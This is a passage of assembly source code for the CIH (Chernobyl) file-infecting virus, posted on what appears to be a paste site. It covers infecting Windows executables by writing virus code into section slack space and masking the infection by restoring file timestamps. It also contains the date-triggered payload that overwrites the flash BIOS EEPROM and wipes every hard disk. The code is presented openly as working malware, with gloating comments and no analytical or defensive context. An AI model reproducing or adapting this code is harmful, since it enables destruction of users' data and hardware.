  978. jbe EndOfWriteCodeToSections
  979.  
  980. push ebx ; Size
  981.  
  982. sub eax, 08h
  983. mov [eax], ebx
  984.  
  985. mov ebx, (PointerToRawData-@9)[edx]
  986. add ebx, (VirtualSize-@9)[edx]
  987. push ebx ; Pointer of File
  988.  
  989. push edi ; Address of Buffer
  990.  
  991. mov ebx, (VirtualSize-@9)[edx]
  992. add ebx, (VirtualAddress-@9)[edx]
  993. add ebx, (ImageBase-@9)[esi]
  994. mov [eax+4], ebx
  995.  
  996. mov ebx, [eax]
  997. add (VirtualSize-@9)[edx], ebx
  998.  
  999. ; Section contains initialized data ==> 00000040h
  1000. ; Section can be Read. ==> 40000000h
  1001. or (Characteristics-@9)[edx], 40000040h
  1002.  
  1003. StartToWriteCodeToSections:
  1004.  
  1005. sub ebp, ebx
  1006. jbe SetVirusCodeSectionTableEndMark
  1007.  
  1008. add edi, ebx ; Move Address of Buffer
  1009.  
  1010. EndOfWriteCodeToSections:
  1011.  
  1012. loop LoopOfWriteCodeToSections
  1013.  
  1014. ; ***************************
  1015. ; * Only Set Infected Mark *
  1016. ; ***************************
  1017.  
  1018. OnlySetInfectedMark:
  1019. mov esp, dr1
  1020.  
  1021. jmp WriteVirusCodeToFile
  1022.  
  1023. ; ***************************
  1024. ; * Not Set Infected Mark *
  1025. ; ***************************
  1026.  
  1027. NotSetInfectedMark:
  1028. add esp, 3ch
  1029.  
  1030. jmp CloseFile
  1031.  
  1032. ; ***************************
  1033. ; * Set Virus Code *
  1034. ; * Section Table End Mark *
  1035. ; ***************************
  1036.  
  1037. SetVirusCodeSectionTableEndMark:
  1038.  
  1039. ; Adjust Size of Virus Section Code to Correct Value
  1040. add [eax], ebp
  1041. add [esp+08h], ebp
  1042.  
  1043. ; Set End Mark
  1044. xor ebx, ebx
  1045. mov [eax-04h], ebx
  1046.  
  1047. ; ***************************
  1048. ; * When VirusGame Calls *
  1049. ; * VxDCall, VMM Modifies *
  1050. ; * the 'int 20h' and the *
  1051. ; * 'Service Identifier' *
  1052. ; * to 'Call [XXXXXXXX]'. *
  1053. ; ***************************
  1054. ; * Before Writing My Virus *
  1055. ; * to File, I Must Restore *
  1056. ; * them First. ^__^ *
  1057. ; ***************************
  1058.  
  1059. lea eax, (LastVxDCallAddress-2-@9)[esi]
  1060.  
  1061. mov cl, VxDCallTableSize
  1062.  
  1063. LoopOfRestoreVxDCallID:
  1064. mov word ptr [eax], 20cdh
  1065.  
  1066. mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
  1067. mov [eax+2], edx
  1068.  
  1069. movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
  1070. sub eax, edx
  1071.  
  1072. loop LoopOfRestoreVxDCallID
  1073.  
  1074. ; ***************************
  1075. ; * Let's Write *
  1076. ; * Virus Code to the File *
  1077. ; ***************************
  1078.  
  1079. WriteVirusCodeToFile:
  1080. mov eax, dr1
  1081. mov ebx, [eax+10h]
  1082. mov edi, [eax]
  1083.  
  1084. LoopOfWriteVirusCodeToFile:
  1085.  
  1086. pop ecx
  1087. jecxz SetFileModificationMark
  1088.  
  1089. mov esi, ecx
  1090. mov eax, 0d601h
  1091. pop edx
  1092. pop ecx
  1093.  
  1094. call edi ; VXDCall IFSMgr_Ring0_FileIO
  1095.  
  1096. jmp LoopOfWriteVirusCodeToFile
  1097.  
  1098. ; ***************************
  1099. ; * Let's Set CF = 1 ==> *
  1100. ; * Need to Restore File *
  1101. ; * Modification Time *
  1102. ; ***************************
  1103.  
  1104. SetFileModificationMark:
  1105. pop ebx
  1106. pop eax
  1107.  
  1108. stc ; Enable CF(Carry Flag)
  1109. pushf
  1110.  
  1111. ; *************************************
  1112. ; * Close File *
  1113. ; *************************************
  1114.  
  1115. CloseFile:
  1116. xor eax, eax
  1117. mov ah, 0d7h
  1118. call edi ; VXDCall IFSMgr_Ring0_FileIO
  1119.  
  1120. ; *************************************
  1121. ; * Need to Restore File Modification *
  1122. ; * Time !? *
  1123. ; *************************************
  1124.  
  1125. popf
  1126. pop esi
  1127. jnc IsKillComputer
  1128.  
  1129. ; *************************************
  1130. ; * Restore File Modification Time *
  1131. ; *************************************
  1132.  
  1133. mov ebx, edi
  1134.  
  1135. mov ax, 4303h
  1136. mov ecx, (FileModificationTime-@7)[esi]
  1137. mov edi, (FileModificationTime+2-@7)[esi]
  1138. call ebx ; VXDCall IFSMgr_Ring0_FileIO
  1139.  
  1140. ; *************************************
  1141. ; * Disable OnBusy *
  1142. ; *************************************
  1143.  
  1144. DisableOnBusy:
  1145. dec byte ptr (OnBusy-@7)[esi] ; Disable OnBusy
  1146.  
  1147. ; *************************************
  1148. ; * Call Previous FileSystemApiHook *
  1149. ; *************************************
  1150.  
  1151. prevhook:
  1152. popad
  1153.  
  1154. mov eax, dr0 ;
  1155. jmp [eax] ; Jump to prevhook
  1156.  
  1157. ; *************************************
  1158. ; * Call the Function that the IFS *
  1159. ; * Manager Would Normally Call to *
  1160. ; * Implement this Particular I/O *
  1161. ; * Request. *
  1162. ; *************************************
  1163.  
  1164. pIFSFunc:
  1165. mov ebx, esp
  1166. push dword ptr [ebx+20h+04h+14h] ; Push pioreq
  1167. call [ebx+20h+04h] ; Call pIFSFunc
  1168. pop ecx ;
  1169.  
  1170. mov [ebx+1ch], eax ; Modify EAX Value in Stack
  1171.  
  1172. ; ***************************
  1173. ; * After Calling pIFSFunc, *
  1174. ; * Get Some Data from the *
  1175. ; * Returned pioreq. *
  1176. ; ***************************
  1177.  
  1178. cmp dword ptr [ebx+20h+04h+04h], 00000024h
  1179. jne QuitMyVirusFileSystemHook
  1180.  
  1181. ; *****************
  1182. ; * Get the File *
  1183. ; * Modification *
  1184. ; * Date and Time *
  1185. ; * in DOS Format.*
  1186. ; *****************
  1187.  
  1188. mov eax, [ecx+28h]
  1189. mov (FileModificationTime-@6)[esi], eax
  1190.  
  1191. ; ***************************
  1192. ; * Quit My Virus' *
  1193. ; * IFSMgr_FileSystemHook *
  1194. ; ***************************
  1195.  
  1196. QuitMyVirusFileSystemHook:
  1197.  
  1198. popad
  1199.  
  1200. ret
  1201.  
  1202. ; *************************************
  1203. ; * Kill Computer !? ... *^_^* *
  1204. ; *************************************
  1205.  
  1206. IsKillComputer:
  1207. ; Get Now Day from BIOS CMOS
  1208. mov al, 07h
  1209. out 70h, al
  1210. in al, 71h
  1211.  
  1212. xor al, 26h ; ??/26/????
  1213.  
  1214. IF DEBUG
  1215. jmp DisableOnBusy
  1216. ELSE
  1217. jnz DisableOnBusy
  1218. ENDIF
  1219.  
  1220. ; **************************************
  1221. ; * Kill Kill Kill Kill Kill Kill Kill *
  1222. ; * Kill Kill Kill Kill Kill Kill Kill *
  1223. ; * Kill Kill Kill Kill Kill Kill Kill *
  1224. ; * Kill Kill Kill Kill Kill Kill Kill *
  1225. ; * Kill Kill Kill Kill Kill Kill Kill *
  1226. ; * Kill Kill Kill Kill Kill Kill Kill *
  1227. ; * Kill Kill Kill Kill Kill Kill Kill *
  1228. ; * Kill Kill Kill Kill Kill Kill Kill *
  1229. ; * Kill Kill Kill Kill Kill Kill Kill *
  1230. ; * Kill Kill Kill Kill Kill Kill Kill *
  1231. ; * Kill Kill Kill Kill Kill Kill Kill *
  1232. ; * Kill Kill Kill Kill Kill Kill Kill *
  1233. ; * Kill Kill Kill Kill Kill Kill Kill *
  1234. ; * Kill Kill Kill Kill Kill Kill Kill *
  1235. ; * Kill Kill Kill Kill Kill Kill Kill *
  1236. ; * Kill Kill Kill Kill Kill Kill Kill *
  1237. ; * Kill Kill Kill Kill Kill Kill Kill *
  1238. ; * Kill Kill Kill Kill Kill Kill Kill *
  1239. ; **************************************
  1240.  
  1241. ; ***************************
  1242. ; * Kill BIOS EEPROM *
  1243. ; ***************************
  1244.  
  1245. mov bp, 0cf8h
  1246. lea esi, IOForEEPROM-@7[esi]
  1247.  
  1248. ; ***********************
  1249. ; * Show BIOS Page in *
  1250. ; * 000E0000 - 000EFFFF *
  1251. ; * ( 64 KB ) *
  1252. ; ***********************
  1253.  
  1254. mov edi, 8000384ch
  1255. mov dx, 0cfeh
  1256. cli
  1257. call esi
  1258.  
  1259. ; ***********************
  1260. ; * Show BIOS Page in *
  1261. ; * 000F0000 - 000FFFFF *
  1262. ; * ( 64 KB ) *
  1263. ; ***********************
  1264.  
  1265. mov di, 0058h
  1266. dec edx ; and al,0fh
  1267. mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h
  1268. call esi
  1269.  
  1270. ; ***********************
  1271. ; * Show the BIOS Extra *
  1272. ; * ROM Data in Memory *
  1273. ; * 000E0000 - 000E01FF *
  1274. ; * ( 512 Bytes ) *
  1275. ; * , and the Section *
  1276. ; * of Extra BIOS can *
  1277. ; * be Writted... *
  1278. ; ***********************
  1279.  
  1280. lea ebx, EnableEEPROMToWrite-@10[esi]
  1281.  
  1282. mov eax, 0e5555h
  1283. mov ecx, 0e2aaah
  1284. call ebx
  1285. mov byte ptr [eax], 60h
  1286.  
  1287. push ecx
  1288. loop $
  1289.  
  1290. ; ***********************
  1291. ; * Kill the BIOS Extra *
  1292. ; * ROM Data in Memory *
  1293. ; * 000E0000 - 000E007F *
  1294. ; * ( 80h Bytes ) *
  1295. ; ***********************
  1296.  
  1297. xor ah, ah
  1298. mov [eax], al
  1299.  
  1300. xchg ecx, eax
  1301. loop $
  1302.  
  1303. ; ***********************
  1304. ; * Show and Enable the *
  1305. ; * BIOS Main ROM Data *
  1306. ; * 000E0000 - 000FFFFF *
  1307. ; * ( 128 KB ) *
  1308. ; * can be Writted... *
  1309. ; ***********************
  1310.  
  1311. mov eax, 0f5555h
  1312. pop ecx
  1313. mov ch, 0aah
  1314. call ebx
  1315. mov byte ptr [eax], 20h
  1316.  
  1317. loop $
  1318.  
  1319. ; ***********************
  1320. ; * Kill the BIOS Main *
  1321. ; * ROM Data in Memory *
  1322. ; * 000FE000 - 000FE07F *
  1323. ; * ( 80h Bytes ) *
  1324. ; ***********************
  1325.  
  1326. mov ah, 0e0h
  1327. mov [eax], al
  1328.  
  1329. ; ***********************
  1330. ; * Hide BIOS Page in *
  1331. ; * 000F0000 - 000FFFFF *
  1332. ; * ( 64 KB ) *
  1333. ; ***********************
  1334. ; or al,10h
  1335. mov word ptr (BooleanCalculateCode-@10)[esi], 100ch
  1336. call esi
  1337.  
  1338. ; ***************************
  1339. ; * Kill All HardDisk *
  1340. ; ***************************************************
  1341. ; * IOR Structure of IOS_SendCommand Needs *
  1342. ; ***************************************************
  1343. ; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
  1344. ; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
  1345. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1346. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
  1347. ; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
  1348. ; ***************************************************
  1349.  
  1350. KillHardDisk:
  1351. xor ebx, ebx
  1352. mov bh, FirstKillHardDiskNumber
  1353. push ebx
  1354. sub esp, 2ch
  1355. push 0c0001000h
  1356. mov bh, 08h
  1357. push ebx
  1358. push ecx
  1359. push ecx
  1360. push ecx
  1361. push 40000501h
  1362. inc ecx
  1363. push ecx
  1364. push ecx
  1365.  
  1366. mov esi, esp
  1367. sub esp, 0ach
  1368.  
  1369. LoopOfKillHardDisk:
  1370. int 20h
  1371. dd 00100004h ; VXDCall IOS_SendCommand
  1372.  
  1373. cmp word ptr [esi+06h], 0017h
  1374. je KillNextDataSection
  1375.  
  1376. ChangeNextHardDisk:
  1377. inc byte ptr [esi+4dh]
  1378.  
  1379. jmp LoopOfKillHardDisk
  1380.  
  1381. KillNextDataSection:
  1382. add dword ptr [esi+10h], ebx
  1383. mov byte ptr [esi+4dh], FirstKillHardDiskNumber
  1384.  
  1385. jmp LoopOfKillHardDisk
  1386.  
  1387. ; ***************************
  1388. ; * Enable EEPROM to Write *
  1389. ; ***************************
  1390.  
  1391. EnableEEPROMToWrite:
  1392. mov [eax], cl
  1393. mov [ecx], al
  1394. mov byte ptr [eax], 80h
  1395. mov [eax], cl
  1396. mov [ecx], al
  1397.  
  1398. ret
  1399.  
  1400. ; ***************************
  1401. ; * IO for EEPROM *
  1402. ; ***************************
  1403.  
  1404. IOForEEPROM:
  1405. @10 = IOForEEPROM
  1406.  
  1407. xchg eax, edi
  1408. xchg edx, ebp
  1409. out dx, eax
  1410.  
  1411. xchg eax, edi
  1412. xchg edx, ebp
  1413. in al, dx
  1414.  
  1415. BooleanCalculateCode = $
  1416. or al, 44h
  1417.  
  1418. xchg eax, edi
  1419. xchg edx, ebp
  1420. out dx, eax
  1421.  
  1422. xchg eax, edi
  1423. xchg edx, ebp
  1424. out dx, al
  1425.  
  1426. ret
  1427.  
  1428. ; *********************************************************
  1429. ; * Static Data *
  1430. ; *********************************************************
  1431.  
  1432. LastVxDCallAddress = IFSMgr_Ring0_FileIO
  1433. VxDCallAddressTable db 00h
  1434. db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
  1435. db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
  1436. db IFSMgr_Ring0_FileIO-UniToBCSPath
  1437.  
  1438. VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h
  1439. VxDCallTableSize = ($-VxDCallIDTable)/04h
  1440.  
  1441. ; *********************************************************
  1442. ; * Virus Version Copyright *
  1443. ; *********************************************************
  1444.  
  1445. VirusVersionCopyright db 'CIH v'
  1446. db MajorVirusVersion+'0'
  1447. db '.'
  1448. db MinorVirusVersion+'0'
  1449. db ' TATUNG'
  1450.  
  1451. ; *********************************************************
  1452. ; * Virus Size *
  1453. ; *********************************************************
  1454.  
  1455. VirusSize = $
  1456. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1457. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1458. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1459.  
  1460. ; *********************************************************
  1461. ; * Dynamic Data *
  1462. ; *********************************************************
  1463.  
  1464. VirusGameDataStartAddress = VirusSize
  1465. @6 = VirusGameDataStartAddress
  1466. OnBusy db 0
  1467. FileModificationTime dd ?
  1468.  
  1469. FileNameBuffer db FileNameBufferSize dup(?)
  1470. @7 = FileNameBuffer
  1471.  
  1472. DataBuffer = $
  1473. @8 = DataBuffer
  1474. NumberOfSections dw ?
  1475. TimeDateStamp dd ?
  1476. SymbolsPointer dd ?
  1477. NumberOfSymbols dd ?
  1478. SizeOfOptionalHeader dw ?
  1479. _Characteristics dw ?
  1480. Magic dw ?
  1481. LinkerVersion dw ?
  1482. SizeOfCode dd ?
  1483. SizeOfInitializedData dd ?
  1484. SizeOfUninitializedData dd ?
  1485. AddressOfEntryPoint dd ?
  1486. BaseOfCode dd ?
  1487. BaseOfData dd ?
  1488. ImageBase dd ?
  1489. @9 = $
  1490. SectionAlignment dd ?
  1491. FileAlignment dd ?
  1492. OperatingSystemVersion dd ?
  1493. ImageVersion dd ?
  1494. SubsystemVersion dd ?
  1495. Reserved dd ?
  1496. SizeOfImage dd ?
  1497. SizeOfHeaders dd ?
  1498. SizeOfImageHeaderToRead = $-NumberOfSections
  1499.  
  1500. NewAddressOfEntryPoint = DataBuffer ; DWORD
  1501. SizeOfImageHeaderToWrite = 04h
  1502.  
  1503. StartOfSectionTable = @9
  1504. SectionName = StartOfSectionTable ; QWORD
  1505. VirtualSize = StartOfSectionTable+08h ; DWORD
  1506. VirtualAddress = StartOfSectionTable+0ch ; DWORD
  1507. SizeOfRawData = StartOfSectionTable+10h ; DWORD
  1508. PointerToRawData = StartOfSectionTable+14h ; DWORD
  1509. PointerToRelocations = StartOfSectionTable+18h ; DWORD
  1510. PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD
  1511. NumberOfRelocations = StartOfSectionTable+20h ; WORD
  1512. NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD
  1513. Characteristics = StartOfSectionTable+24h ; DWORD
  1514. SizeOfScetionTable = Characteristics+04h-SectionName
  1515.  
  1516. ; *********************************************************
  1517. ; * Virus Total Need Memory *
  1518. ; *********************************************************
  1519.  
  1520. VirusNeedBaseMemory = $
  1521.  
  1522. VirusTotalNeedMemory = @9
  1523. ; + NumberOfSections(??)*SizeOfScetionTable(28h)
  1524. ; + SizeOfVirusCodeSectionTableEndMark(04h)
  1525. ; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
  1526. ; + SizeOfTheFirstVirusCodeSectionTable(04h)
  1527.  
  1528. ; *********************************************************
  1529. ; *********************************************************
  1530.  
  1531. VirusGame ENDS
  1532.  
  1533. END FileHeader
Comments
Add Comment
Please, Sign In to add comment